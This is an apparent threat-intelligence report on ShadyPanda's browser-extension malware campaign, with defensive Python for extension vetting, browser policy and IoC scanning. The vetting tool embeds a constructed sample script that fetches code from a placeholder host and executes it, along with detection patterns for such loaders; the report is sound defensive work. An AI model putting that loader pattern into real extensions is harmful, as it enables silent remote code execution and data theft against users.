ShadyPanda’s Seven-Year Operation Built a Browser Extension Spy Empire

Amber | Actor Report
The ShadyPanda threat actor, a likely China-based cybercriminal group, orchestrated a seven-year browser extension malware operation that compromised more than 4.3 million Chrome and Edge users worldwide. The campaign exploited the trust built into browser extension marketplaces by running clean, functional extensions for years before converting them into delivery systems for silent malicious updates. The operation split into two core attack tracks: a remote code execution backdoor affecting roughly 300,000 users through five extensions, including Clean Master, which carried Google's Featured and Verified badges, and a large-scale spyware effort reaching more than 4 million users through five additional extensions that funneled browsing data to servers in China. ShadyPanda demonstrated long-term operational discipline and a precise understanding of marketplace security blind spots, keeping the extensions' behavior legitimate to grow large user bases before activating malicious payloads. Google's endorsement of these extensions through Featured and Verified badges amplified their reach and credibility, letting the threat actor weaponize the extension marketplace itself. Over seven years, ShadyPanda refined a method that blended trust-building, mass adoption, affiliate fraud targeting platforms such as eBay, Amazon, and Booking.com, and silent malicious update delivery through a remote execution framework that enabled credential theft and session hijacking.

Actor Details

China-Based Threat Actor Compromises 4.3 Million Browser Users

ShadyPanda is a likely China-based threat actor behind a seven-year browser extension malware operation that compromised more than 4.3 million Chrome and Edge users globally. The group exploited the trust built into extension marketplaces by running clean, functional browser extensions for years before converting them into delivery systems for silent malicious updates. This patient, long-term strategy allowed ShadyPanda to build massive user bases on Google Chrome and Microsoft Edge before weaponizing the extensions for espionage and financial gain.

Dual-Track Operation: RCE Backdoors and Mass Spyware Deployment

The ShadyPanda operation split into two core attack tracks. First, a remote code execution backdoor affecting roughly 300,000 users was deployed through five browser extensions, including Clean Master, which carried Google's Featured and Verified marketplace credibility badges. Second, a large-scale spyware effort reached more than 4 million users through five additional ShadyPanda extensions that systematically funneled browsing data, search queries, and behavioral information to command-and-control servers located in China. This dual-track approach maximized both espionage collection and financial fraud opportunities.

Patient Trust-Building Strategy Exploited Marketplace Blind Spots

The threat actor ShadyPanda demonstrated long-term operational discipline and a precise understanding of browser extension marketplace security blind spots. Its strategy hinged on patience: the extensions behaved entirely legitimately for multiple years, growing large user bases before malicious payloads were activated. Google's official endorsement of these extensions through Featured and Verified badges amplified their reach and credibility, enabling the threat actor to weaponize the marketplace trust system itself. Over seven years, ShadyPanda refined a method that blended trust-building, mass user adoption, and silent malicious update delivery.

Affiliate Fraud and Data Monetization as Core Profit Engine

The core profit engine for ShadyPanda operations was systematic affiliate fraud. When users visited e-commerce platforms such as eBay, Amazon, or Booking.com, the ShadyPanda extensions injected hidden affiliate codes, silently diverting sales commissions to the threat actor. The malicious extensions also embedded Google Analytics trackers to harvest and monetize detailed behavioral data, logging search queries, site visits, and click patterns. This dual monetization strategy generated revenue from both fraudulent affiliate commissions and the sale of harvested user behavioral data.

Remote Execution Framework Enabled Advanced Attack Capabilities

Each ShadyPanda-infected browser carried a remote execution framework that continuously polled attacker infrastructure for new commands, retrieved arbitrary JavaScript code, and executed it with the full browser permissions granted to the extension. The ShadyPanda extensions also enabled adversary-in-the-middle capabilities, supporting credential theft, session hijacking, and live code injection across websites visited by compromised users. Even after several ShadyPanda extensions were identified and removed from official marketplaces, the threat actor continued refining its tactics and pursuing new malicious extension delivery paths, demonstrating a persistent commitment to the browser extension attack vector.
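The loader shape described above (an extension that fetches text from a remote server and hands it to a code-execution primitive, backed by broad permissions) is something a reviewer can screen for before an extension is approved. The following is an added example, not code from the advisory or from Hive Pro's platform: a small static assessor that scores an unpacked extension from its manifest and JavaScript sources. The sample manifest, the sample scripts, and the `cdn.example.invalid` endpoint are constructed for illustration; the permission names and match patterns are Chrome's real manifest vocabulary.

```python
import json
import re

# Constructed sample extension package (not a real ShadyPanda sample): a
# Manifest V3 manifest plus one background script that shows the loader shape
# the advisory describes, i.e. polling a remote server and executing whatever
# JavaScript it returns.
SAMPLE_MANIFEST = json.dumps({
    "manifest_version": 3,
    "name": "Example Cleaner",
    "version": "2.4.1",
    "permissions": ["scripting", "tabs", "storage", "cookies", "webRequest"],
    "host_permissions": ["<all_urls>"],
    "background": {"service_worker": "bg.js"},
})

SAMPLE_BACKGROUND_JS = r"""
const ENDPOINT = "https://cdn.example.invalid/update";  // constructed placeholder
async function poll() {
  const r = await fetch(ENDPOINT + "?v=" + chrome.runtime.getManifest().version);
  const body = await r.text();
  new Function(body)();   // runs whatever the server returned
}
setInterval(poll, 60 * 60 * 1000);
"""

# A benign comparison package: narrow permissions, no dynamic code.
BENIGN_MANIFEST = json.dumps({
    "manifest_version": 3,
    "name": "Example Notes",
    "version": "1.0.0",
    "permissions": ["storage"],
})
BENIGN_JS = "chrome.storage.local.set({opened: Date.now()});"

# Permissions that let an extension observe or modify arbitrary sites.
HIGH_RISK_PERMISSIONS = {"webRequest", "webRequestBlocking", "scripting",
                         "cookies", "declarativeNetRequest", "debugger"}
BROAD_HOST_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

# Source-level markers; remote fetching combined with eval/Function is the
# "download code, then run it" pattern behind silent malicious updates.
DYNAMIC_CODE_PATTERNS = {
    "eval_call": re.compile(r"\beval\s*\("),
    "function_ctor": re.compile(r"\bnew\s+Function\s*\("),
    "remote_fetch": re.compile(r"\bfetch\s*\(|XMLHttpRequest"),
    "script_injection": re.compile(r"chrome\.scripting\.executeScript|tabs\.executeScript"),
    "timer_poll": re.compile(r"\bsetInterval\s*\("),
}


def assess_extension(manifest_json, scripts):
    """Score one extension from its manifest and its JS sources.

    Returns {"findings": {label: detail}, "score": int}. Higher scores mean
    more reasons for a human reviewer to look before approval.
    """
    manifest = json.loads(manifest_json)
    perms = set(manifest.get("permissions", []))
    # MV2 packages list host patterns under "permissions"; MV3 uses
    # "host_permissions". Treat both the same way.
    hosts = set(manifest.get("host_permissions", [])) | {
        p for p in perms if "://" in p or p == "<all_urls>"}
    findings = {}
    score = 0

    risky = sorted(perms & HIGH_RISK_PERMISSIONS)
    if risky:
        findings["high_risk_permissions"] = risky
        score += len(risky)
    broad = sorted(hosts & BROAD_HOST_PATTERNS)
    if broad:
        findings["broad_host_access"] = broad
        score += 2

    hits = {}
    for filename, src in scripts.items():
        for label, pattern in DYNAMIC_CODE_PATTERNS.items():
            if pattern.search(src):
                hits.setdefault(label, []).append(filename)
    findings.update(hits)
    score += len(hits)

    # The combination is the real signal: fetched text reaching eval/Function.
    if "remote_fetch" in hits and ({"eval_call", "function_ctor"} & hits.keys()):
        findings["remote_code_loader"] = sorted(set(hits["remote_fetch"]))
        score += 3
    return {"findings": findings, "score": score}


if __name__ == "__main__":
    for name, m, js in (("sample", SAMPLE_MANIFEST, {"bg.js": SAMPLE_BACKGROUND_JS}),
                        ("benign", BENIGN_MANIFEST, {"popup.js": BENIGN_JS})):
        print(name, json.dumps(assess_extension(m, js), indent=2))
```

The score is deliberately coarse; its purpose is triage, not verdicts. The `remote_code_loader` finding is the one that maps directly to the silent-update behavior in this advisory, and a clean first version of an extension will not carry it, which is exactly why vetting has to be repeated on every update rather than once at approval time.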

Recommendations

Eliminate Trust-Based Extension Approval: Remove organizational reliance on browser extension marketplace verification labels. Treat Google Featured and Verified badges as non-security indicators and apply independent security vetting before approving any browser extension deployment. The ShadyPanda campaign demonstrates that marketplace endorsements provide no guarantee against malicious behavior and can actually amplify threat actor reach.

Harden Enterprise Browser Baselines: Minimize permitted browser extensions to a strictly vetted set with demonstrated business value. Block consumer-grade browser extensions and tools that provide unnecessary attack surface with no operational value. Implement extension allowlisting policies that prevent users from installing arbitrary extensions from Chrome Web Store or Edge Add-ons marketplace without security approval.
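One way to express the default-deny baseline recommended above, as an added example that is not part of the advisory or of any Hive Pro product: a generator for the Chrome/Edge managed `ExtensionSettings` policy (where the `"*"` entry sets the default for every extension) together with an audit routine that flags an exported policy which silently leaves the store open. The policy key names and `installation_mode` values are the ones Chromium-based browsers document; the extension IDs, protected host patterns, and message text are constructed placeholders and must be replaced with the organization's own vetted set.

```python
import json
import re

# Chrome Web Store / Edge Add-ons extension IDs are 32 characters from a-p.
EXTENSION_ID_RE = re.compile(r"^[a-p]{32}$")

# Extensions the organization has vetted. The IDs here are constructed
# placeholders, not real extension IDs; replace them with the vetted set.
VETTED_EXTENSION_IDS = {
    "abcdefghijklmnopabcdefghijklmnop": "Password manager (hypothetical)",
    "ponmlkjihgfedcbaponmlkjihgfedcba": "Ticketing integration (hypothetical)",
}

# Sites no extension may read or script at runtime, even if allowlisted.
# Constructed placeholder patterns in Chrome match-pattern syntax.
PROTECTED_HOSTS = ["*://sso.corp.example.invalid/*", "*://admin.corp.example.invalid/*"]

BLOCK_MESSAGE = "Extensions must be approved by IT security before installation."


def build_managed_policy(vetted, protected_hosts, message=BLOCK_MESSAGE):
    """Return the policy JSON (as a dict) for a default-deny extension baseline.

    Uses the ExtensionSettings policy (the "*" entry is the default for every
    extension) and also sets the older ExtensionInstallBlocklist /
    ExtensionInstallAllowlist pair for browsers that still honor them.
    """
    for ext_id in vetted:
        if not EXTENSION_ID_RE.match(ext_id):
            raise ValueError(f"not a valid extension ID: {ext_id!r}")
    settings = {
        "*": {
            "installation_mode": "blocked",
            "blocked_install_message": message,
            "runtime_blocked_hosts": list(protected_hosts),
        }
    }
    for ext_id in sorted(vetted):
        settings[ext_id] = {"installation_mode": "allowed"}
    return {
        "ExtensionSettings": settings,
        "ExtensionInstallBlocklist": ["*"],
        "ExtensionInstallAllowlist": sorted(vetted),
    }


def audit_policy(policy):
    """Return a list of baseline weaknesses found in an exported policy dict."""
    problems = []
    settings = policy.get("ExtensionSettings", {})
    default = settings.get("*", {})
    if default.get("installation_mode") != "blocked":
        problems.append("default installation_mode is not 'blocked' (users may install anything)")
    if not default.get("runtime_blocked_hosts"):
        problems.append("no runtime_blocked_hosts: allowlisted extensions can still script sensitive sites")
    if "*" in policy.get("ExtensionInstallAllowlist", []):
        problems.append("ExtensionInstallAllowlist contains '*', which re-opens the store")
    if policy.get("ExtensionInstallBlocklist") != ["*"]:
        problems.append("ExtensionInstallBlocklist does not deny by default")
    for ext_id, entry in settings.items():
        if ext_id != "*" and entry.get("installation_mode") in ("force_installed", "normal_installed"):
            problems.append(f"{ext_id} is pushed automatically; confirm it was vetted")
    return problems


if __name__ == "__main__":
    policy = build_managed_policy(VETTED_EXTENSION_IDS, PROTECTED_HOSTS)
    # Deploy this JSON through the browser's managed-policy channel, e.g. the
    # /etc/opt/chrome/policies/managed/ directory on Linux or the Chrome/Edge
    # policy registry path on Windows.
    print(json.dumps(policy, indent=2))
    print("audit:", audit_policy(policy) or "no problems found")
```

The `runtime_blocked_hosts` entry matters even for vetted extensions: an extension that turns malicious after years of clean updates, the pattern this advisory describes, still cannot read or inject into the listed sites, so the blast radius of a later silent update is bounded regardless of what the allowlist decision was.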

Mandate Network Controls for Extension Traffic: Inspect outbound network connections from browser extension processes using network security controls. Flag suspicious analytics beacons, connections to domains associated with ShadyPanda infrastructure, and unauthorized data exfiltration paths. Monitor for affiliate code injection behavior and unexpected command-and-control communications from extension processes.

Enforce Continuous Extension Behavior Monitoring: Track real-time extension behaviors such as search query redirection, affiliate code injection into e-commerce sites, or unauthorized data transmission to external servers. Detect malicious behavioral shifts in previously legitimate extensions instead of relying solely on static marketplace reviews. Deploy browser security solutions capable of monitoring extension activity and alerting on suspicious changes matching ShadyPanda tactics.

Indicators of Compromise (IoCs)

Domains: extensionplay[.]com, yearnnewtab[.]com, api[.]cgatgpt[.]net, dergoodting[.]com, cleanmasters[.]store, s-85283[.]gotocdn[.]com, s-82923[.]gotocdn[.]com

Browser Extension IDs: eagiakjmjnblliacokhcalebgnhellfi, ibiejjpajlfljcgjndbonclhcbdcamai, ogjneoecnllmjcegcfpaamfpbiaaiekh, jbnopeoocgbmnochaadfnhiiimfpbpmf, cdgonefipacceedbkflolomdegncceid, gipnpcencdgljnaecpekokmpgnhgpela, bpgaffohfacaamplbbojgbiicfgedmoi, ineempkjpmbdejmdgienaphomigjjiej, nnnklgkfdfbdijeeglhjfleaoagiagig, and numerous additional malicious extension IDs associated with the ShadyPanda campaign across Chrome and Edge platforms.
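The domain and extension-ID indicators above are straightforward to operationalize against two data sources an enterprise usually already has: outbound proxy logs (the network control recommended earlier) and a per-host inventory of installed extensions. The following is an added example, not code from the advisory: it refangs the published domains, matches proxy log hosts on exact name or subdomain only (so that a lookalike such as a longer name merely ending in the same letters does not count), and cross-checks an inventory against the published extension IDs. The proxy log format, client addresses, hostnames `wks-a`/`wks-b`/`wks-c`, and the one non-IoC extension ID are constructed for the example.

```python
import re

# IoCs copied from the advisory (defanged as published).
IOC_DOMAINS = [
    "extensionplay[.]com", "yearnnewtab[.]com", "api[.]cgatgpt[.]net",
    "dergoodting[.]com", "cleanmasters[.]store",
    "s-85283[.]gotocdn[.]com", "s-82923[.]gotocdn[.]com",
]
IOC_EXTENSION_IDS = {
    "eagiakjmjnblliacokhcalebgnhellfi", "ibiejjpajlfljcgjndbonclhcbdcamai",
    "ogjneoecnllmjcegcfpaamfpbiaaiekh", "jbnopeoocgbmnochaadfnhiiimfpbpmf",
    "cdgonefipacceedbkflolomdegncceid", "gipnpcencdgljnaecpekokmpgnhgpela",
    "bpgaffohfacaamplbbojgbiicfgedmoi", "ineempkjpmbdejmdgienaphomigjjiej",
    "nnnklgkfdfbdijeeglhjfleaoagiagig",
}

# Constructed proxy log lines in a simple "timestamp client method url status"
# layout; not real traffic. Line 3 is a deliberate near-miss that must not match.
SAMPLE_PROXY_LOG = """\
2025-12-05T10:01:12Z 10.0.0.12 GET https://s-85283.gotocdn.com/ext/update.js 200
2025-12-05T10:01:13Z 10.0.0.12 POST https://www.dergoodting.com/api/collect 200
2025-12-05T10:02:40Z 10.0.0.15 GET https://notextensionplay.com/index.html 200
2025-12-05T10:03:05Z 10.0.0.15 GET https://api.cgatgpt.net:443/v1/cmd 200
2025-12-05T10:04:00Z 10.0.0.20 GET https://www.example.invalid/ 200
"""

# Constructed per-host inventory of installed extension IDs, as an endpoint
# agent might report it. One placeholder ID (not in the advisory) is included.
SAMPLE_INVENTORY = {
    "wks-a": ["eagiakjmjnblliacokhcalebgnhellfi", "abcdefghijklmnopabcdefghijklmnop"],
    "wks-b": ["bpgaffohfacaamplbbojgbiicfgedmoi", "ineempkjpmbdejmdgienaphomigjjiej"],
    "wks-c": ["abcdefghijklmnopabcdefghijklmnop"],
}

URL_HOST_RE = re.compile(r"https?://([^/\s:?#]+)")


def refang(domain):
    """Turn a defanged 'a[.]b' indicator back into a matchable hostname."""
    return domain.replace("[.]", ".").strip().lower().rstrip(".")


def host_matches(host, ioc):
    """Exact or subdomain match only; 'notextensionplay.com' must not match."""
    host = host.lower().rstrip(".")
    return host == ioc or host.endswith("." + ioc)


def scan_proxy_log(text):
    """Return (client, host, matched_ioc) for each log line hitting an IoC domain."""
    iocs = [refang(d) for d in IOC_DOMAINS]
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        m = URL_HOST_RE.search(parts[3])
        if not m:
            continue
        host = m.group(1)
        for ioc in iocs:
            if host_matches(host, ioc):
                hits.append((parts[1], host, ioc))
                break
    return hits


def scan_extension_inventory(inventory):
    """Return {hostname: [matched IDs]} for hosts carrying an IoC extension ID."""
    return {h: sorted(set(ids) & IOC_EXTENSION_IDS)
            for h, ids in inventory.items() if set(ids) & IOC_EXTENSION_IDS}


if __name__ == "__main__":
    for client, host, ioc in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(f"{client} contacted {host} (matches IoC {ioc})")
    for host, ids in scan_extension_inventory(SAMPLE_INVENTORY).items():
        print(f"{host} has IoC extension IDs: {', '.join(ids)}")
```

Because the advisory notes that further extension IDs exist beyond those listed, a proxy hit on one of the domains should be treated as the stronger signal: an inventory that shows none of the listed IDs does not clear a host that is talking to this infrastructure.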

MITRE ATT&CK TTPs

The ShadyPanda threat actor demonstrates tactics and techniques spanning the following MITRE ATT&CK categories:

Initial Access (TA0001): Drive-by Compromise (T1189)
Execution (TA0002): Command and Scripting Interpreter (T1059), JavaScript (T1059.007)
Persistence (TA0003): Software Extensions (T1176), Browser Extensions (T1176.001)
Defense Evasion (TA0005): Obfuscated Files or Information (T1027), Execution Guardrails (T1480), Masquerading (T1036)
Discovery (TA0007): Browser Information Discovery (T1217)
Collection (TA0009): Steal Web Session Cookie (T1539), Browser Session Hijacking (T1185), Data from Local System (T1005), Input Capture (T1056), Credential API Hooking (T1056.004)
Command and Control (TA0011): Application Layer Protocol (T1071), Web Protocols (T1071.001), Encrypted Channel (T1573), Adversary-in-the-Middle (T1557)
Exfiltration (TA0010): Exfiltration Over C2 Channel (T1041), Exfiltration Over Web Service (T1567)

References

https://www.koi.ai/blog/4-million-browsers-infected-inside-shadypanda-7-year-malware-campaign

https://hivepro.com/threat-advisory/i-paid-twice-inside-the-booking-com-phishing-fraud/
